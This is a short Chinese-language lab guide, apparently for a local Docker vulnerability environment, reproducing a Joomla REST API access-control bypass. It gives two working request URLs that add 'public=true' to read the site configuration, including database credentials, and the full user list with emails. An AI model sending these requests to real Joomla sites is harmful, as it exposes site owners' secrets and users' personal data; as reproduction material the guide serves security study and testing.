环境搭建
sudo docker-compose up -d
查看端口号
服务启动后,访问http://your-ip:8080即可查看到Joomla页面
这个漏洞是由于错误的属性覆盖导致的,攻击者可以通过在访问Rest API时传入参数public=true来绕过权限校验。比如,访问下面这个链接即可读取所有配置项,包括数据库连接用户名和密码:
http://your-ip:8080/api/index.php/v1/config/application?public=true
如果不添加public=true,则访问会被拒绝:
访问下面这个链接即可读取所有用户信息,包含邮箱等:
http://your-ip:8080/api/index.php/v1/users?public=true